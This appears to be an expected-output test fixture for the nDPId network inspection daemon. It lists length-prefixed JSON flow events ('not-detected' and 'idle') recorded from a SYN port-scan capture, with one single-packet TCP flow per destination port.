-00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061007,"flow_last_seen":1278275061007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32777,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061007,"flow_last_seen":1278275061007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49161,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32778,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49163,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32779,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32778,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":863,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32779,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":863,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":830,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49163,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":830,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6156,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32780,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49165,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32780,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6156,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058531,"flow_last_seen":1278275058531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32781,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058531,"flow_last_seen":1278275058531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32781,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49165,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32782,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32781,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32781,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49167,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49167,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":998,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":998,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":827,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32782,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 